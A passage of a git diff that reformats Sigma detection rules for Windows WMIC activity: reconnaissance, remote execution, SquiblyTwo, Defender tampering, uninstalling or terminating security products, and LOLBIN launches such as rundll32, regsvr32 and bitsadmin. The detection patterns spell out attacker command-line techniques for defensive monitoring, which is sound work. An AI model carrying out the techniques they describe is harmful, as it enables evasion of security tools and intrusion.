b/sigma/sysmon/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml @@ -25,8 +25,6 @@ detection: condition: process_creation and selection falsepositives: - Legitimate event consumers - - Dell computers on some versions register an event consumer that is known to - cause false positives when brightness is changed by the corresponding keyboard - button + - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml index 6e27487f6..02a716919 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml @@ -1,8 +1,7 @@ title: New ActiveScriptEventConsumer Created Via Wmic.EXE id: ebef4391-1a81-4761-a40a-1db446c0e625 status: test -description: Detects WMIC executions in which an event consumer gets created. This - could be used to establish persistence +description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence references: - https://twitter.com/johnlatwc/status/1408062131321270282?s=12 - https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ActiveScriptEventConsumer - ' CREATE ' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_namespace_defender.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_namespace_defender.yml index 2cf82e89d..c8eabb532 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_namespace_defender.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_namespace_defender.yml @@ -1,8 +1,7 @@ title: Potential Windows Defender Tampering Via Wmic.EXE id: 51cbac1e-eee3-4a90-b1b7-358efb81fa0a status: test -description: Detects potential tampering with Windows Defender settings such as adding - exclusion using wmic +description: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic references: - https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: wmic.exe - - Image|endswith: \WMIC.exe + - OriginalFileName: wmic.exe + - Image|endswith: \WMIC.exe selection_cli: - CommandLine|contains: /Namespace:\\\\root\\Microsoft\\Windows\\Defender + CommandLine|contains: /Namespace:\\\\root\\Microsoft\\Windows\\Defender condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_process_creation.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_process_creation.yml index 828f907a2..f25966d4c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_process_creation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_process_creation.yml @@ -1,11 +1,10 @@ title: New Process Created Via Wmic.EXE id: 526be59f-a573-4eea-b5f7-f0973207634d related: - - id: 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 - type: derived + - id: 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 # For suspicious process creation + type: derived status: test -description: Detects new process creation using WMIC via the "process call create" - flag +description: Detects new process creation using WMIC via the "process call create" flag references: - https://www.sans.org/blog/wmic-for-incident-response/ - https://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process @@ -25,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - Image|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - process - call - create diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_computersystem.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_computersystem.yml index 4048328a2..74b1c0539 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_computersystem.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_computersystem.yml @@ -1,8 +1,7 @@ title: Computer System Reconnaissance Via Wmic.EXE id: 9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f status: test -description: Detects execution of wmic utility with the "computersystem" flag in order - to obtain information about the machine such as the domain, username, model, etc. +description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc. references: - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ author: Nasreddine Bencherchali (Nextron Systems) @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - Image|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: computersystem + CommandLine|contains: computersystem condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_csproduct.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_csproduct.yml index d7544dcb0..aec06ec8f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_csproduct.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_csproduct.yml @@ -1,8 +1,7 @@ title: Hardware Model Reconnaissance Via Wmic.EXE id: 3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d status: test -description: Detects the execution of WMIC with the "csproduct" which is used to obtain - information such as hardware models and vendor information +description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information references: - https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/ - https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - Image|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: csproduct + CommandLine|contains: csproduct condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_group.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_group.yml index 82b6af544..8a783789d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_group.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_group.yml @@ -1,17 +1,11 @@ title: Local Groups Reconnaissance Via Wmic.EXE id: 164eda96-11b2-430b-85ff-6a265c15bf32 status: test -description: 'Detects the execution of "wmic" with the "group" flag. - +description: | + Detects the execution of "wmic" with the "group" flag. Adversaries may attempt to find local system groups and permission settings. - - The knowledge of local system permission groups can help adversaries determine - which groups exist and which users belong to a particular group. - - Adversaries may use this information to determine which users have elevated permissions, - such as the users found within the local administrators group. - - ' + The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. + Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md author: frack113 @@ -29,10 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - Image|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: ' group' + CommandLine|contains: ' group' condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_hotfix.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_hotfix.yml index 53ef3a5fc..d43b80f7b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_hotfix.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_hotfix.yml @@ -1,9 +1,7 @@ title: Windows Hotfix Updates Reconnaissance Via Wmic.EXE id: dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45 status: test -description: Detects the execution of wmic with the "qfe" flag in order to obtain - information about installed hotfix updates on the system. This is often used by - pentester and attacker enumeration scripts +description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts references: - https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat - https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html @@ -22,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: wmic.exe - - Image|endswith: \WMIC.exe + - OriginalFileName: wmic.exe + - Image|endswith: \WMIC.exe selection_cli: - CommandLine|contains: ' qfe' + CommandLine|contains: ' qfe' condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_process.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_process.yml index 7f9392200..0f53440bd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_process.yml @@ -1,9 +1,7 @@ title: Process Reconnaissance Via Wmic.EXE id: 221b251a-357a-49a9-920a-271802777cc0 status: test -description: Detects the execution of "wmic" with the "process" flag, which adversary - might use to list processes running on the compromised host or list installed - software hotfixes and patches. +description: Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic @@ -22,12 +20,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - Image|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: process + CommandLine|contains: process filter_main_creation: - CommandLine|contains|all: + CommandLine|contains|all: + # Rule id 526be59f-a573-4eea-b5f7-f0973207634d for `wmic process call create #{process_to_execute}` - call - create condition: process_creation and (all of selection* and not 1 of filter_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_product.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_product.yml index 05d9c2ec4..42dc346e4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_product.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_product.yml @@ -1,8 +1,7 @@ title: Potential Product Reconnaissance Via Wmic.EXE id: 15434e33-5027-4914-88d5-3d4145ec25a9 status: test -description: Detects the execution of WMIC in order to get a list of firewall and - antivirus products +description: Detects the execution of WMIC in order to get a list of firewall and antivirus products references: - https://thedfirreport.com/2023/03/06/2022-year-in-review/ - https://www.yeahhub.com/list-installed-programs-version-path-windows/ @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - Image|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: Product + CommandLine|contains: Product condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_product_class.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_product_class.yml index ed4da1d40..e84984a80 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_product_class.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_product_class.yml @@ -1,8 +1,7 @@ title: Potential Product Class Reconnaissance Via Wmic.EXE id: e568650b-5dcd-4658-8f34-ded0b1e13992 status: test -description: Detects the execution of WMIC in order to get a list of firewall and - antivirus products +description: Detects the execution of WMIC in order to get a list of firewall and antivirus products references: - https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md - https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1 @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - Image|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - AntiVirusProduct - FirewallProduct condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_service.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_service.yml index ce42048eb..98cb5ce84 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_service.yml @@ -1,22 +1,14 @@ title: Service Reconnaissance Via Wmic.EXE id: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae related: - - id: 68bcd73b-37ef-49cb-95fc-edc809730be6 - type: similar + - id: 68bcd73b-37ef-49cb-95fc-edc809730be6 + type: similar status: test -description: 'An adversary might use WMI to check if a certain remote service is running - on a remote device. - - When the test completes, a service information will be displayed on the screen - if it exists. - - A common feedback message is that "No instance(s) Available" if the service queried - is not running. - - A common error message is "Node - (provided IP or default) ERROR Description =The - RPC server is unavailable" if the provided remote host is unreachable - - ' +description: | + An adversary might use WMI to check if a certain remote service is running on a remote device. + When the test completes, a service information will be displayed on the screen if it exists. + A common feedback message is that "No instance(s) Available" if the service queried is not running. + A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic @@ -34,10 +26,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - Image|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: service + CommandLine|contains: service condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml index 173eb37b2..6c8b26b22 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml @@ -1,20 +1,14 @@ title: Uncommon System Information Discovery Via Wmic.EXE id: 9d5a1274-922a-49d0-87f3-8c653483b909 related: - - id: d85ecdd7-b855-4e6e-af59-d9c78b5b861e - type: derived + - id: d85ecdd7-b855-4e6e-af59-d9c78b5b861e + type: derived status: experimental -description: 'Detects the use of the WMI command-line (WMIC) utility to identify and - display various system information, - - including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; - and baseboard, BIOS, - +description: | + Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, + including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. - Some of these commands were used by Aurora Stealer in late 2022/early 2023. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic - https://nwgat.ninja/getting-system-information-with-wmic-on-windows/ @@ -37,11 +31,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_wmic: - - Description: WMI Commandline Utility - - OriginalFileName: wmic.exe - - Image|endswith: \WMIC.exe + - Description: WMI Commandline Utility + - OriginalFileName: wmic.exe + - Image|endswith: \WMIC.exe selection_commands: - CommandLine|contains: + CommandLine|contains: - LOGICALDISK get Name,Size,FreeSpace - os get Caption,OSArchitecture,Version condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml index 4fe9a097d..3dda59014 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml @@ -1,13 +1,12 @@ title: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE id: 68bcd73b-37ef-49cb-95fc-edc809730be6 related: - - id: 09658312-bc27-4a3b-91c5-e49ab9046d1b - type: similar - - id: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae - type: similar + - id: 09658312-bc27-4a3b-91c5-e49ab9046d1b # PowerShell Variant + type: similar + - id: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae + type: similar status: experimental -description: Detects known WMI recon method to look for unquoted service paths using - wmic. Often used by pentester and attacker enumeration scripts +description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts references: - https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py - https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1 @@ -27,10 +26,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: wmic.exe - - Image|endswith: \WMIC.exe + - OriginalFileName: wmic.exe + - Image|endswith: \WMIC.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' service get ' - name,displayname,pathname,startmode condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_remote_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_remote_execution.yml index cae1495c4..c91f79802 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_remote_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_remote_execution.yml @@ -1,10 +1,10 @@ title: WMIC Remote Command Execution id: 7773b877-5abb-4a3e-b9c9-fd0369b59b00 related: - - id: e42af9df-d90b-4306-b7fb-05c863847ebd - type: obsoletes - - id: 09af397b-c5eb-4811-b2bb-08b3de464ebf - type: obsoletes + - id: e42af9df-d90b-4306-b7fb-05c863847ebd + type: obsoletes + - id: 09af397b-c5eb-4811-b2bb-08b3de464ebf + type: obsoletes status: test description: Detects the execution of WMIC to query information on a remote system references: @@ -24,12 +24,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - Image|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: '/node:' + CommandLine|contains: '/node:' filter_localhost: - CommandLine|contains: + CommandLine|contains: - '/node:127.0.0.1 ' - '/node:localhost ' condition: process_creation and (all of selection_* and not 1 of filter_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_service_manipulation.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_service_manipulation.yml index 552f33e7b..2686bee50 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_service_manipulation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_service_manipulation.yml @@ -19,13 +19,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: wmic.exe - - Image|endswith: \WMIC.exe + - OriginalFileName: wmic.exe + - Image|endswith: \WMIC.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' service ' - ' call ' - CommandLine|contains: + CommandLine|contains: - stopservice - startservice condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml index 4c258ae38..2ac309d82 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml @@ -1,11 +1,10 @@ title: Potential SquiblyTwo Technique Execution id: 8d63dadf-b91b-4187-87b6-34a1114577ea status: test -description: Detects potential SquiblyTwo attack technique with possible renamed WMIC - via Imphash and OriginalFileName fields +description: Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields references: - https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html - - https://twitter.com/mattifestation/status/986280382042595328 + - https://twitter.com/mattifestation/status/986280382042595328 # Deleted - https://atomicredteam.io/defense-evasion/T1220/ - https://lolbas-project.github.io/lolbas/Binaries/Wmic/ author: Markus Neis, Florian Roth @@ -27,18 +26,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_pe: - - Image|endswith: \wmic.exe - - OriginalFileName: wmic.exe - - Imphash: - - 1B1A3F43BF37B5BFE60751F2EE2F326E - - 37777A96245A3C74EB217308F3546F4C - - 9D87C9D67CE724033C0B40CC4CA1B206 - - Hashes|contains: - - IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E - - IMPHASH=37777A96245A3C74EB217308F3546F4C - - IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206 + - Image|endswith: \wmic.exe + - OriginalFileName: wmic.exe + - Imphash: + - 1B1A3F43BF37B5BFE60751F2EE2F326E + - 37777A96245A3C74EB217308F3546F4C + - 9D87C9D67CE724033C0B40CC4CA1B206 + - Hashes|contains: # Sysmon field hashes contains all types + - IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E + - IMPHASH=37777A96245A3C74EB217308F3546F4C + - IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206 selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'format:' - http condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml index 4e7e8b48f..75fa64511 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml @@ -1,19 +1,18 @@ title: Suspicious WMIC Execution Via Office Process id: e1693bc8-7168-4eab-8718-cdcaa68a1738 related: - - id: 438025f9-5856-4663-83f7-52f878a70a50 - type: derived - - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a - type: obsoletes - - id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0 - type: obsoletes - - id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5 - type: obsoletes - - id: 04f5363a-6bca-42ff-be70-0d28bf629ead - type: obsoletes + - id: 438025f9-5856-4663-83f7-52f878a70a50 + type: derived + - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a + type: obsoletes + - id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0 + type: obsoletes + - id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5 + type: obsoletes + - id: 04f5363a-6bca-42ff-be70-0d28bf629ead + type: obsoletes status: test -description: Office application called wmic to proxye execution through a LOLBIN process. - This is often used to break suspicious parent-child chain (Office app spawns LOLBin). +description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin). references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -47,14 +46,15 @@ detection: - \wordpad.exe - \wordview.exe selection_wmic_img: - - Image|endswith: \wbem\WMIC.exe - - OriginalFileName: wmic.exe + - Image|endswith: \wbem\WMIC.exe + - OriginalFileName: wmic.exe selection_wmic_cli: - CommandLine|contains|all: + CommandLine|contains|all: - process - create - call - CommandLine|contains: + CommandLine|contains: + # Add more suspicious LOLBINs as you see fit - regsvr32 - rundll32 - msiexec diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_susp_process_creation.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_susp_process_creation.yml index fd1ec37a1..62453b73a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_susp_process_creation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_susp_process_creation.yml @@ -1,11 +1,10 @@ title: Suspicious Process Created Via Wmic.EXE id: 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 related: - - id: 526be59f-a573-4eea-b5f7-f0973207634d - type: derived + - id: 526be59f-a573-4eea-b5f7-f0973207634d # Generic + type: derived status: test -description: Detects WMIC executing "process call create" with suspicious calls to - processes such as "rundll32", "regsrv32", etc. +description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc. references: - https://thedfirreport.com/2020/10/08/ryuks-return/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker @@ -24,11 +23,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'process ' - 'call ' - 'create ' - CommandLine|contains: + CommandLine|contains: + # Add more susupicious paths and binaries as you see fit in your env - rundll32 - bitsadmin - regsvr32 diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_terminate_application.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_terminate_application.yml index 776d08f2e..c4013c26c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_terminate_application.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_terminate_application.yml @@ -1,11 +1,10 @@ title: Application Terminated Via Wmic.EXE id: 49d9671b-0a0a-4c09-8280-d215bfd30662 related: - - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 - type: derived + - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 # Uninstall Security Products + type: derived status: experimental -description: Detects calls to the "terminate" function via wmic in order to kill an - application +description: Detects calls to the "terminate" function via wmic in order to kill an application references: - https://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/ - https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf @@ -23,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - Image|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - call - terminate condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_uninstall_application.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_uninstall_application.yml index a8ab3d301..2f1fb5e6b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_uninstall_application.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_uninstall_application.yml @@ -1,8 +1,8 @@ title: Application Removed Via Wmic.EXE id: b53317a0-8acf-4fd1-8de8-a5401e776b96 related: - - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 - type: derived + - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 # Uninstall Security Products + type: derived status: test description: Uninstall an application with wmic references: @@ -22,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - Image|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - call - uninstall condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_uninstall_security_products.yml b/sigma/sysmon/process_creation/proc_creation_win_wmic_uninstall_security_products.yml index 90603ad6b..fb884c273 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wmic_uninstall_security_products.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wmic_uninstall_security_products.yml @@ -1,11 +1,10 @@ title: Potential Tampering With Security Products Via WMIC id: 847d5ff3-8a31-4737-a970-aeae8fe21765 related: - - id: b53317a0-8acf-4fd1-8de8-a5401e776b96 - type: derived + - id: b53317a0-8acf-4fd1-8de8-a5401e776b96 # Generic Uninstall + type: derived status: test -description: Detects uninstallation or termination of security products using the - WMIC utility +description: Detects uninstallation or termination of security products using the WMIC utility references: - https://twitter.com/cglyer/status/1355171195654709249 - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ @@ -27,26 +26,26 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - 'product where ' - call - uninstall - /nointeractive selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - 'caption like ' - CommandLine|contains: + CommandLine|contains: - call delete - call terminate selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - 'process ' - 'where ' - delete selection_product: - CommandLine|contains: + CommandLine|contains: - '%carbon%' - '%cylance%' - '%endpoint%' diff --git a/sigma/sysmon/process_creation/proc_creation_win_wmic_xsl_script_processing.yml 